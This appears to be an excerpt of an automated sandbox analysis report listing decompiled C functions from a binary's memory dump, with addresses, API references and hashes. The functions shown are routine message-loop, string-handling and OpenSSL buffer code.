Uniqueness Score: -1.00%

Function 0041FA40 Relevance: 7.5, APIs: 5, Instructions: 48
windowsynchronizationthreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041FA40(long* __ecx) {
				struct tagMSG _v32;
				long _t9;
				struct HWND__** _t14;

				_t14 = __ecx;
				PostThreadMessageW( *__ecx, 0x12, 0, 0);
				do {
					while(PeekMessageW( &_v32, 0, 0, 0, 1) != 0) {
						DispatchMessageW( &_v32);
					}
					_t9 = WaitForSingleObject(_t14[1], 0xa);
				} while (_t9 == 0x102);
				_t14[1] = 0;
				 *_t14 = 0;
				return _t9;
			}

0x0041fa4b
0x0041fa53
0x0041fa65
0x0041fa75
0x0041fa7b
0x0041fa8b
0x0041fa94
0x0041fa9a
0x0041faa3
0x0041faaa
0x0041fab4

APIs

PostThreadMessageW.USER32 ref: 0041FA53
PeekMessageW.USER32 ref: 0041FA71
DispatchMessageW.USER32 ref: 0041FA7B
PeekMessageW.USER32 ref: 0041FA89
WaitForSingleObject.KERNEL32(?,0000000A,?,00000012,00000000,00000000), ref: 0041FA94

Memory Dump Source

Source File: 00000006.00000002.634364468.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.634364468.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.634364468.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_E640.jbxd

Yara matches

Similarity

API ID: Message$Peek$DispatchObjectPostSingleThreadWait
String ID:
API String ID: 1380987712-0
Opcode ID: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
Instruction ID: 7dc02704ba958b7d98511173c4623a4fa8f2b4100db45197b38ae147ea501182
Opcode Fuzzy Hash: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
Instruction Fuzzy Hash: 6301AE31B4030577EB205B55DC86FA73B6DDB44B40F544061FB04EE1D1D7F9984587A4

Uniqueness

Uniqueness Score: -1.00%

Function 0041FDF0 Relevance: 7.5, APIs: 5, Instructions: 48
windowsynchronizationthreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041FDF0(long* __ecx) {
				struct tagMSG _v32;
				long _t9;
				struct HWND__** _t14;

				_t14 = __ecx;
				PostThreadMessageW( *__ecx, 0x12, 0, 0);
				do {
					while(PeekMessageW( &_v32, 0, 0, 0, 1) != 0) {
						DispatchMessageW( &_v32);
					}
					_t9 = WaitForSingleObject(_t14[1], 0xa);
				} while (_t9 == 0x102);
				_t14[1] = 0;
				 *_t14 = 0;
				return _t9;
			}

0x0041fdfb
0x0041fe03
0x0041fe15
0x0041fe25
0x0041fe2b
0x0041fe3b
0x0041fe44
0x0041fe4a
0x0041fe53
0x0041fe5a
0x0041fe64

APIs

PostThreadMessageW.USER32 ref: 0041FE03
PeekMessageW.USER32 ref: 0041FE21
DispatchMessageW.USER32 ref: 0041FE2B
PeekMessageW.USER32 ref: 0041FE39
WaitForSingleObject.KERNEL32(?,0000000A,?,00000012,00000000,00000000), ref: 0041FE44

Memory Dump Source

Source File: 00000006.00000002.634364468.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.634364468.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.634364468.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_E640.jbxd

Yara matches

Similarity

API ID: Message$Peek$DispatchObjectPostSingleThreadWait
String ID:
API String ID: 1380987712-0
Opcode ID: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
Instruction ID: d705e8d6a79994c6a13c6d22e65b3a6180ae01e64e8e6a22fa5ca061b0d405f5
Opcode Fuzzy Hash: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
Instruction Fuzzy Hash: 3501A931B80308B7EB205B95ED8AF973B6DEB44B00F144061FA04EF1E1D7F5A8468BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00417BA0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 188
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E00417BA0(signed int __ebx, signed int __ecx, signed int _a4, signed int _a8, signed int _a12, signed int _a16) {
				signed int _v0;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v44;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t101;
				signed int _t104;
				signed int _t107;
				signed int _t109;
				signed int _t111;
				signed int _t113;
				signed int _t116;
				intOrPtr _t122;
				intOrPtr _t128;
				intOrPtr* _t136;
				signed int _t137;
				intOrPtr* _t139;
				signed int _t146;
				intOrPtr _t154;
				signed int _t155;
				intOrPtr _t162;
				signed int _t171;
				signed int _t174;
				signed int _t176;
				signed int _t177;
				signed int _t180;
				intOrPtr* _t186;
				signed int _t187;
				signed int _t191;
				intOrPtr _t196;
				signed int _t199;
				signed int _t200;
				intOrPtr _t204;
				signed int _t206;
				intOrPtr* _t207;
				void* _t209;
				signed int _t210;
				intOrPtr* _t211;
				intOrPtr* _t212;
				intOrPtr* _t215;
				void* _t217;
				signed int _t218;
				signed int _t219;
				signed int _t221;
				signed int _t222;
				intOrPtr _t223;
				void* _t224;
				signed int _t233;
				signed int _t238;
				intOrPtr* _t239;
				signed int _t241;
				void* _t250;
				void* _t252;
				void* _t253;

				_t176 = __ebx;
				_push(__ecx);
				_t206 = _a12;
				_t238 = __ecx;
				_push(_t221);
				if(_t206 == 0) {
					L13:
					_t186 =  *((intOrPtr*)(_t238 + 0x10));
					_t101 = _a4;
					__eflags = _t186 - _t101;
					if(__eflags < 0) {
						_push("invalid string position");
						E0044F26C(__eflags);
						goto L46;
					} else {
						_t233 = _a8;
						_t217 = _t186 - _t101;
						__eflags = _t217 - _t233;
						_push(_t176);
						_t176 = _a16;
						_t221 =  <  ? _t217 : _t233;
						_t186 = _t186 - _t221;
						__eflags = (_t101 | 0xffffffff) - _t176 - _t186;
						if(__eflags <= 0) {
							L46:
							_push("string too long");
							E0044F23E(__eflags);
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							_t250 = _t252;
							_t253 = _t252 - 8;
							_push(_t238);
							_push(_t221);
							_t222 = _v12;
							_t239 = _t186;
							__eflags = _t222;
							if(_t222 == 0) {
								L60:
								_t104 =  *(_t239 + 0x10);
								_t187 = _v0;
								__eflags = _t104 - _t187;
								if(__eflags < 0) {
									_push("invalid string position");
									E0044F26C(__eflags);
									goto L91;
								} else {
									_t209 = _t104 - _t187;
									_t187 = _a12;
									_push(_t176);
									_t180 = _a4;
									__eflags = _t209 - _t180;
									_t176 =  <  ? _t209 : _t180;
									_t113 = _t104 - _t176;
									_a4 = _t113;
									__eflags = (_t113 | 0xffffffff) - _t187 - _a4;
									if(__eflags <= 0) {
										L91:
										_push("string too long");
										E0044F23E(__eflags);
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										_push(_t250);
										_push(_t176);
										_push(_t239);
										_push(_t222);
										_t223 = _v44;
										__eflags =  *((intOrPtr*)(_t187 + 0x10)) - _t223;
										_t224 =  <  ?  *((void*)(_t187 + 0x10)) : _t223;
										__eflags =  *((intOrPtr*)(_t187 + 0x14)) - 8;
										if( *((intOrPtr*)(_t187 + 0x14)) >= 8) {
											_t187 =  *_t187;
										}
										_t177 = _a8;
										__eflags = _t224 - _t177;
										_t241 =  <  ? _t224 : _t177;
										__eflags = _t241;
										if(_t241 == 0) {
											L98:
											_t107 = 0;
											__eflags = 0;
										} else {
											_t207 = _a4;
											while(1) {
												__eflags =  *_t187 -  *_t207;
												if( *_t187 !=  *_t207) {
													break;
												}
												_t187 = _t187 + 2;
												_t207 = _t207 + 2;
												_t241 = _t241 - 1;
												__eflags = _t241;
												if(_t241 != 0) {
													continue;
												} else {
													goto L98;
												}
												goto L99;
											}
											_t111 =  *_t187 & 0x0000ffff;
											__eflags = _t111 -  *_t207;
											asm("sbb eax, eax");
											_t107 = (_t111 & 0xfffffffe) + 1;
										}
										L99:
										__eflags = _t107;
										if(_t107 != 0) {
											L104:
											return _t107;
										} else {
											__eflags = _t224 - _t177;
											if(_t224 >= _t177) {
												__eflags = _t224 - _t177;
												_t100 = _t224 != _t177;
												__eflags = _t100;
												_t107 = 0 | _t100;
												goto L104;
											} else {
												_t109 = _t107 | 0xffffffff;
												__eflags = _t109;
												return _t109;
											}
										}
									} else {
										_t210 = _t209 - _t176;
										_v16 = _t210;
										__eflags = _t187 - _t176;
										if(_t187 < _t176) {
											_t128 =  *((intOrPtr*)(_t239 + 0x14));
											__eflags = _t128 - 8;
											if(_t128 < 8) {
												_a4 = _t239;
											} else {
												_a4 =  *_t239;
												_t222 = _a8;
											}
											__eflags = _t128 - 8;
											if(_t128 < 8) {
												_v12 = _t239;
											} else {
												_v12 =  *_t239;
											}
											__eflags = _t210;
											if(_t210 != 0) {
												E004205A0(_v12 + (_v0 + _t187) * 2, _a4 + (_v0 + _t176) * 2, _t210 + _t210);
												_t222 = _a8;
												_t253 = _t253 + 0xc;
												_t187 = _a12;
											}
										}
										__eflags = _t187;
										if(_t187 != 0) {
											L73:
											_a4 = _t187 - _t176 +  *(_t239 + 0x10);
											_t116 = E00415D50(_t176, _t239, _t222, _t239, _t187 - _t176 +  *(_t239 + 0x10), 0);
											__eflags = _t116;
											if(_t116 != 0) {
												_t191 = _a12;
												__eflags = _t176 - _t191;
												if(_t176 >= _t191) {
													_t182 = _v0;
												} else {
													_t122 =  *((intOrPtr*)(_t239 + 0x14));
													__eflags = _t122 - 8;
													if(_t122 < 8) {
														_t212 = _t239;
													} else {
														_t212 =  *_t239;
													}
													__eflags = _t122 - 8;
													if(_t122 < 8) {
														_a8 = _t239;
													} else {
														_a8 =  *_t239;
													}
													_t182 = _v0;
													E0040B600(_a8 + (_v0 + _t191) * 2, _t212 + (_v0 + _t176) * 2, _v16);
													_t191 = _a12;
													_t253 = _t253 + 4;
												}
												__eflags =  *((intOrPtr*)(_t239 + 0x14)) - 8;
												if( *((intOrPtr*)(_t239 + 0x14)) < 8) {
													_t211 = _t239;
												} else {
													_t211 =  *_t239;
												}
												__eflags = _t191;
												if(_t191 != 0) {
													E0042D8D0(_t211 + _t182 * 2, _t222, _t191 + _t191);
												}
												E00414DF0(_t239, _a4);
											}
										} else {
											__eflags = _t176;
											if(_t176 != 0) {
												goto L73;
											}
										}
										return _t239;
									}
								}
							} else {
								_t196 =  *((intOrPtr*)(_t239 + 0x14));
								__eflags = _t196 - 8;
								if(_t196 < 8) {
									_t136 = _t239;
								} else {
									_t136 =  *_t239;
								}
								__eflags = _t222 - _t136;
								if(_t222 < _t136) {
									goto L60;
								} else {
									__eflags = _t196 - 8;
									if(_t196 < 8) {
										_t215 = _t239;
									} else {
										_t215 =  *_t239;
									}
									_t137 =  *(_t239 + 0x10);
									__eflags = _t215 + _t137 * 2 - _t222;
									if(_t215 + _t137 * 2 <= _t222) {
										goto L60;
									} else {
										__eflags = _t196 - 8;
										if(_t196 < 8) {
											_t139 = _t239;
										} else {
											_t139 =  *_t239;
										}
										__eflags = _t222 - _t139;
										return E00414920(_t176, _t239, _t222 - _t139 >> 1, _t239, _v0, _a4, _t239, _t222 - _t139 >> 1, _a12);
									}
								}
							}
						} else {
							_t218 = _t217 - _t221;
							_v8 = _t218;
							__eflags = _t176 - _t221;
							if(_t176 < _t221) {
								_t162 =  *((intOrPtr*)(_t238 + 0x14));
								__eflags = _t162 - 0x10;
								if(_t162 < 0x10) {
									_a8 = _t238;
								} else {
									_a8 =  *_t238;
								}
								__eflags = _t162 - 0x10;
								if(_t162 < 0x10) {
									_a16 = _t238;
								} else {
									_a16 =  *_t238;
								}
								__eflags = _t218;
								if(_t218 != 0) {
									__eflags = _a16 + _a4 + _t176;
									E004205A0(_a16 + _a4 + _t176, _a8 + _a4 + _t221, _t218);
									_t252 = _t252 + 0xc;
								}
							}
							__eflags = _t176;
							if(_t176 != 0) {
								L26:
								_push(0);
								_a16 = _t176 - _t221 +  *((intOrPtr*)(_t238 + 0x10));
								_t146 = E00415810(_t176, _t238, _t221, _t176 - _t221 +  *((intOrPtr*)(_t238 + 0x10)));
								__eflags = _t146;
								if(_t146 == 0) {
									goto L44;
								} else {
									__eflags = _t221 - _t176;
									if(_t221 < _t176) {
										_t154 =  *((intOrPtr*)(_t238 + 0x14));
										__eflags = _t154 - 0x10;
										if(_t154 < 0x10) {
											_a8 = _t238;
										} else {
											_a8 =  *_t238;
										}
										__eflags = _t154 - 0x10;
										if(_t154 < 0x10) {
											_t219 = _t238;
										} else {
											_t219 =  *_t238;
										}
										_t155 = _v8;
										__eflags = _t155;
										if(_t155 != 0) {
											__eflags = _t219 + _a4 + _t176;
											E004205A0(_t219 + _a4 + _t176, _a8 + _a4 + _t221, _t155);
											_t252 = _t252 + 0xc;
										}
									}
									__eflags =  *((intOrPtr*)(_t238 + 0x14)) - 0x10;
									if( *((intOrPtr*)(_t238 + 0x14)) < 0x10) {
										_t199 = _t238;
									} else {
										_t199 =  *_t238;
									}
									__eflags = _t176;
									if(_t176 != 0) {
										__eflags = _a4 + _t199;
										E0042D8D0(_a4 + _t199, _a12, _t176);
									}
									__eflags =  *((intOrPtr*)(_t238 + 0x14)) - 0x10;
									_t200 = _a16;
									 *((intOrPtr*)(_t238 + 0x10)) = _t200;
									if( *((intOrPtr*)(_t238 + 0x14)) < 0x10) {
										 *((char*)(_t238 + _t200)) = 0;
										goto L44;
									} else {
										 *((char*)( *_t238 + _t200)) = 0;
										return _t238;
									}
								}
							} else {
								__eflags = _t221;
								if(_t221 == 0) {
									L44:
									return _t238;
								} else {
									goto L26;
								}
							}
						}
					}
				} else {
					_t204 =  *((intOrPtr*)(__ecx + 0x14));
					if(_t204 < 0x10) {
						_t171 = __ecx;
					} else {
						_t171 =  *((intOrPtr*)(__ecx));
					}
					if(_t206 < _t171) {
						goto L13;
					} else {
						if(_t204 < 0x10) {
							_t221 = _t238;
						} else {
							_t221 =  *_t238;
						}
						if( *((intOrPtr*)(_t238 + 0x10)) + _t221 <= _t206) {
							goto L13;
						} else {
							if(_t204 < 0x10) {
								_t174 = _t238;
							} else {
								_t174 =  *_t238;
							}
							return E00418000(_t176, _t238, _t221, _t238, _a4, _a8, _t238, _t206 - _t174, _a16);
						}
					}
				}
			}

0x00417ba0
0x00417ba3
0x00417ba4
0x00417ba8
0x00417baa
0x00417bad
0x00417bfc
0x00417bfc
0x00417bff
0x00417c02
0x00417c04
0x00417d2c
0x00417d31
0x00000000
0x00417c0a
0x00417c0a
0x00417c0f
0x00417c11
0x00417c13
0x00417c14
0x00417c17
0x00417c1d
0x00417c21
0x00417c23
0x00417d36
0x00417d36
0x00417d3b
0x00417d40
0x00417d41
0x00417d42
0x00417d43
0x00417d44
0x00417d45
0x00417d46
0x00417d47
0x00417d48
0x00417d49
0x00417d4a
0x00417d4b
0x00417d4c
0x00417d4d
0x00417d4e
0x00417d4f
0x00417d51
0x00417d53
0x00417d56
0x00417d57
0x00417d58
0x00417d5b
0x00417d5d
0x00417d5f
0x00417db1
0x00417db1
0x00417db4
0x00417db7
0x00417db9
0x00417edf
0x00417ee4
0x00000000
0x00417dbf
0x00417dc1
0x00417dc3
0x00417dc6
0x00417dc7
0x00417dca
0x00417dcc
0x00417dcf
0x00417dd1
0x00417dd9
0x00417ddc
0x00417ee9
0x00417ee9
0x00417eee
0x00417ef3
0x00417ef4
0x00417ef5
0x00417ef6
0x00417ef7
0x00417ef8
0x00417ef9
0x00417efa
0x00417efb
0x00417efc
0x00417efd
0x00417efe
0x00417eff
0x00417f00
0x00417f03
0x00417f04
0x00417f05
0x00417f06
0x00417f09
0x00417f0c
0x00417f10
0x00417f14
0x00417f16
0x00417f16
0x00417f18
0x00417f1b
0x00417f1f
0x00417f22
0x00417f24
0x00417f41
0x00417f41
0x00417f41
0x00417f26
0x00417f26
0x00417f30
0x00417f33
0x00417f36
0x00000000
0x00000000
0x00417f38
0x00417f3b
0x00417f3e
0x00417f3e
0x00417f3f
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00417f3f
0x00417f55
0x00417f58
0x00417f5b
0x00417f60
0x00417f60
0x00417f43
0x00417f43
0x00417f45
0x00417f6a
0x00417f6e
0x00417f47
0x00417f47
0x00417f49
0x00417f65
0x00417f67
0x00417f67
0x00417f67
0x00000000
0x00417f4b
0x00417f4d
0x00417f4d
0x00417f52
0x00417f52
0x00417f49
0x00417de2
0x00417de2
0x00417de4
0x00417de7
0x00417de9
0x00417deb
0x00417dee
0x00417df1
0x00417dfd
0x00417df3
0x00417df5
0x00417df8
0x00417df8
0x00417e00
0x00417e03
0x00417e0c
0x00417e05
0x00417e07
0x00417e07
0x00417e0f
0x00417e11
0x00417e2e
0x00417e33
0x00417e36
0x00417e39
0x00417e39
0x00417e11
0x00417e3c
0x00417e3e
0x00417e48
0x00417e4f
0x00417e55
0x00417e5a
0x00417e5c
0x00417e5e
0x00417e61
0x00417e63
0x00417ea6
0x00417e65
0x00417e65
0x00417e68
0x00417e6b
0x00417e71
0x00417e6d
0x00417e6d
0x00417e6d
0x00417e73
0x00417e76
0x00417e7f
0x00417e78
0x00417e7a
0x00417e7a
0x00417e8a
0x00417e99
0x00417e9e
0x00417ea1
0x00417ea1
0x00417ea9
0x00417ead
0x00417eb3
0x00417eaf
0x00417eaf
0x00417eaf
0x00417eb5
0x00417eb7
0x00417ec2
0x00417ec7
0x00417ecf
0x00417ecf
0x00417e40
0x00417e40
0x00417e42
0x00000000
0x00000000
0x00417e42
0x00417edc
0x00417edc
0x00417ddc
0x00417d61
0x00417d61
0x00417d64
0x00417d67
0x00417d6d
0x00417d69
0x00417d69
0x00417d69
0x00417d6f
0x00417d71
0x00000000
0x00417d73
0x00417d73
0x00417d76
0x00417d7c
0x00417d78
0x00417d78
0x00417d78
0x00417d7e
0x00417d84
0x00417d86
0x00000000
0x00417d88
0x00417d88
0x00417d8b
0x00417d91
0x00417d8d
0x00417d8d
0x00417d8d
0x00417d96
0x00417dae
0x00417dae
0x00417d86
0x00417d71
0x00417c29
0x00417c29
0x00417c2b
0x00417c2e
0x00417c30
0x00417c32
0x00417c35
0x00417c38
0x00417c41
0x00417c3a
0x00417c3c
0x00417c3c
0x00417c44
0x00417c47
0x00417c50
0x00417c49
0x00417c4b
0x00417c4b
0x00417c53
0x00417c55
0x00417c67
0x00417c6a
0x00417c6f
0x00417c6f
0x00417c55
0x00417c72
0x00417c74
0x00417c7e
0x00417c87
0x00417c8a
0x00417c8d
0x00417c92
0x00417c94
0x00000000
0x00417c9a
0x00417c9a
0x00417c9c
0x00417c9e
0x00417ca1
0x00417ca4
0x00417cad
0x00417ca6
0x00417ca8
0x00417ca8
0x00417cb0
0x00417cb3
0x00417cb9
0x00417cb5
0x00417cb5
0x00417cb5
0x00417cbb
0x00417cbe
0x00417cc0
0x00417cd1
0x00417cd4
0x00417cd9
0x00417cd9
0x00417cc0
0x00417cdc
0x00417ce0
0x00417ce6
0x00417ce2
0x00417ce2
0x00417ce2
0x00417ce8
0x00417cea
0x00417cf3
0x00417cf6
0x00417cfb
0x00417cfe
0x00417d02
0x00417d05
0x00417d08
0x00417d1d
0x00000000
0x00417d0a
0x00417d0e
0x00417d18
0x00417d18
0x00417d08
0x00417c76
0x00417c76
0x00417c78
0x00417d21
0x00417d29
0x00000000
0x00000000
0x00000000
0x00417c78
0x00417c74
0x00417c23
0x00417baf
0x00417baf
0x00417bb5
0x00417bbb
0x00417bb7
0x00417bb7
0x00417bb7
0x00417bbf
0x00000000
0x00417bc1
0x00417bc4
0x00417bca
0x00417bc6
0x00417bc6
0x00417bc6
0x00417bd3
0x00000000
0x00417bd5
0x00417bd8
0x00417bde
0x00417bda
0x00417bda
0x00417bda
0x00417bf9
0x00417bf9
0x00417bd3
0x00417bbf

APIs

_memmove.LIBCMT ref: 00417C6A
_memmove.LIBCMT ref: 00417CD4

Strings

string too long, xrefs: 00417D36
invalid string position, xrefs: 00417D2C

Memory Dump Source

Source File: 00000006.00000002.634364468.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.634364468.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.634364468.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_E640.jbxd

Yara matches

Similarity

API ID: _memmove
String ID: invalid string position$string too long
API String ID: 4104443479-4289949731
Opcode ID: b2c1af29de5962b74b57e5661815869f54c56e8a90a0ab9c91a19098a667a223
Instruction ID: 16eedd03d570a769cf24423414cb71a1906862ef28ca1dd771941f38c47b8a04
Opcode Fuzzy Hash: b2c1af29de5962b74b57e5661815869f54c56e8a90a0ab9c91a19098a667a223
Instruction Fuzzy Hash: C451C3317081089BDB24CE1CD980AAA77B6EF85714B24891FF856CB381DB35EDD18BD9

Uniqueness

Uniqueness Score: -1.00%

Function 00414160 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E00414160(signed int __eax, void* __ebx, intOrPtr* __ecx, signed int __edi, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				intOrPtr* _v20;
				void* __ebp;
				intOrPtr* _t24;
				intOrPtr _t31;
				intOrPtr* _t34;
				intOrPtr _t38;
				intOrPtr* _t39;
				intOrPtr* _t48;
				intOrPtr* _t51;
				intOrPtr _t53;
				intOrPtr* _t56;
				intOrPtr* _t57;
				signed int _t59;
				void* _t60;
				intOrPtr* _t63;
				void* _t67;

				_push(__ecx);
				_push(__ebx);
				_t63 = __ecx;
				_push(__edi);
				_t59 = __edi | 0xffffffff;
				_t51 =  *((intOrPtr*)(__ecx + 0x10));
				if(_t51 < _a4) {
					L32:
					_push("invalid string position");
					E0044F26C(__eflags);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					__eflags =  *((intOrPtr*)(_t51 + 0x14)) - 0x10;
					_t24 = _v20;
					if( *((intOrPtr*)(_t51 + 0x14)) >= 0x10) {
						_t51 =  *_t51;
					}
					 *_t24 = _t51;
					return _t24;
				} else {
					_t48 = _a8;
					_t5 = _t48 + 0x10; // 0xcccccccc
					_t60 =  <  ?  *_t5 : _t59;
					if((__eax | 0xffffffff) - _t51 <= _t60) {
						_push("string too long");
						E0044F23E(__eflags);
						goto L32;
					} else {
						if(_t60 != 0) {
							_push(0);
							_v8 = _t51 + _t60;
							if(E00415810(_t48, __ecx, _t60, _t51 + _t60) != 0) {
								_t31 =  *((intOrPtr*)(__ecx + 0x14));
								if(_t31 < 0x10) {
									_a8 = __ecx;
								} else {
									_a8 =  *__ecx;
								}
								if(_t31 < 0x10) {
									_t56 = _t63;
								} else {
									_t56 =  *_t63;
								}
								_t53 = _a4;
								_t33 =  *((intOrPtr*)(_t63 + 0x10)) != _t53;
								if( *((intOrPtr*)(_t63 + 0x10)) != _t53) {
									E004205A0(_t56 + _t53 + _t60, _a8 + _t53, _t33);
									_t53 = _a4;
									_t67 = _t67 + 0xc;
								}
								if(_t63 != _t48) {
									__eflags =  *((intOrPtr*)(_t48 + 0x14)) - 0x10;
									if( *((intOrPtr*)(_t48 + 0x14)) >= 0x10) {
										_t48 =  *_t48;
									}
									__eflags =  *((intOrPtr*)(_t63 + 0x14)) - 0x10;
									if( *((intOrPtr*)(_t63 + 0x14)) < 0x10) {
										_t34 = _t63;
									} else {
										_t34 =  *_t63;
									}
									__eflags = _t60;
									if(_t60 != 0) {
										__eflags = _t34 + _t53;
										E0042D8D0(_t34 + _t53, _t48, _t60);
										goto L28;
									}
								} else {
									_t38 =  *((intOrPtr*)(_t63 + 0x14));
									if(_t38 < 0x10) {
										_t57 = _t63;
									} else {
										_t57 =  *_t63;
									}
									if(_t38 < 0x10) {
										_t39 = _t63;
									} else {
										_t39 =  *_t63;
									}
									if(_t60 != 0) {
										E004205A0(_t39 + _t53, _t57, _t60);
										L28:
									}
								}
								E00414460(_t63, _v8);
							}
						}
						return _t63;
					}
				}
			}

0x00414163
0x00414164
0x00414166
0x00414168
0x00414169
0x0041416c
0x00414172
0x00414260
0x00414260
0x00414265
0x0041426a
0x0041426b
0x0041426c
0x0041426d
0x0041426e
0x0041426f
0x00414273
0x00414277
0x0041427a
0x0041427c
0x0041427c
0x0041427e
0x00414281
0x00414178
0x00414178
0x0041417f
0x0041417f
0x0041418a
0x00414256
0x0041425b
0x00000000
0x00414190
0x00414192
0x0041419d
0x004141a0
0x004141aa
0x004141b0
0x004141b6
0x004141bf
0x004141b8
0x004141ba
0x004141ba
0x004141c5
0x004141cb
0x004141c7
0x004141c7
0x004141c7
0x004141d0
0x004141d3
0x004141d5
0x004141e4
0x004141e9
0x004141ec
0x004141ec
0x004141f1
0x0041421c
0x00414220
0x00414222
0x00414222
0x00414224
0x00414228
0x0041422e
0x0041422a
0x0041422a
0x0041422a
0x00414230
0x00414232
0x00414235
0x00414239
0x00000000
0x00414239
0x004141f3
0x004141f3
0x004141f9
0x004141ff
0x004141fb
0x004141fb
0x004141fb
0x00414204
0x0041420a
0x00414206
0x00414206
0x00414206
0x0041420e
0x00414215
0x0041423e
0x0041423e
0x0041420e
0x00414246
0x00414246
0x004141aa
0x00414253
0x00414253
0x0041418a

APIs

_memmove.LIBCMT ref: 004141E4
_memmove.LIBCMT ref: 00414215

Strings

string too long, xrefs: 00414256
invalid string position, xrefs: 00414260

Memory Dump Source

Source File: 00000006.00000002.634364468.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.634364468.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.634364468.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_E640.jbxd

Yara matches

Similarity

API ID: _memmove
String ID: invalid string position$string too long
API String ID: 4104443479-4289949731
Opcode ID: 1860cadd0784f8812835e732d2f60387060861baec5cac242feb419a09eb11c6
Instruction ID: c789d4a5c221ce0c411dffae1b259be01e75b302f83ceaf2f45b858c9c7e4579
Opcode Fuzzy Hash: 1860cadd0784f8812835e732d2f60387060861baec5cac242feb419a09eb11c6
Instruction Fuzzy Hash: 3D311430300204ABDB28DE5CD8859AA77B6EFC17507600A5EF865CB381D739EDC18BAD

Uniqueness

Uniqueness Score: -1.00%

Function 0045AD50 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 91
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 96%

			E0045AD50(void* __ebx, void* __edx, void* __ebp, char _a4, char _a8) {
				void* __edi;
				intOrPtr _t17;
				intOrPtr _t18;
				signed int _t36;
				intOrPtr _t44;
				intOrPtr* _t45;
				intOrPtr _t46;

				_t48 = __ebp;
				_t1 =  &_a8; // 0x463743
				_t46 =  *_t1;
				_t2 =  &_a4; // 0x463743
				_t45 =  *_t2;
				_t39 =  *_t45;
				if( *_t45 >= _t46) {
					L3:
					 *_t45 = _t46;
					return _t46;
				} else {
					if( *(_t45 + 8) < _t46) {
						__eflags = _t46 - 0x5ffffffc;
						if(__eflags <= 0) {
							_t17 =  *((intOrPtr*)(_t45 + 4));
							_push(__ebx);
							_t36 = 0xaaaaaaab * (_t46 + 3) >> 0x20 >> 1 << 2;
							__eflags = _t17;
							if(_t17 != 0) {
								_t18 = E00454F30(_t17, _t36, ".\\crypto\\buffer\\buffer.c", 0x7b);
							} else {
								_t18 = E00454E50(_t36, ".\\crypto\\buffer\\buffer.c", 0x79);
							}
							_t44 = _t18;
							__eflags = _t44;
							if(__eflags != 0) {
								__eflags = _t46 -  *_t45;
								 *((intOrPtr*)(_t45 + 4)) = _t44;
								 *(_t45 + 8) = _t36;
								E0042B420( *_t45 + _t44, 0, _t46 -  *_t45);
								 *_t45 = _t46;
								return _t46;
							} else {
								E004512D0(_t36, _t44, _t45, _t48, __eflags, 7, 0x64, 0x41, ".\\crypto\\buffer\\buffer.c", 0x7e);
								__eflags = 0;
								return 0;
							}
						} else {
							E004512D0(__ebx, __edx, _t45, __ebp, __eflags, 7, 0x64, 0x41, ".\\crypto\\buffer\\buffer.c", 0x74);
							__eflags = 0;
							return 0;
						}
					} else {
						E0042B420( *((intOrPtr*)(_t45 + 4)) + _t39, 0, _t46 - _t39);
						goto L3;
					}
				}
			}

0x0045ad50
0x0045ad51
0x0045ad51
0x0045ad56
0x0045ad56
0x0045ad5a
0x0045ad5e
0x0045ad7a
0x0045ad7a
0x0045ad80
0x0045ad60
0x0045ad63
0x0045ad81
0x0045ad87
0x0045adad
0x0045adb0
0x0045adb5
0x0045adb8
0x0045adba
0x0045add7
0x0045adbc
0x0045adc4
0x0045adc9
0x0045addf
0x0045ade1
0x0045ade3
0x0045ae06
0x0045ae08
0x0045ae11
0x0045ae15
0x0045ae1d
0x0045ae24
0x0045ade5
0x0045adf2
0x0045adfa
0x0045ae01
0x0045ae01
0x0045ad89
0x0045ad96
0x0045ad9e
0x0045ada2
0x0045ada2
0x0045ad65
0x0045ad72
0x00000000
0x0045ad77
0x0045ad63

APIs

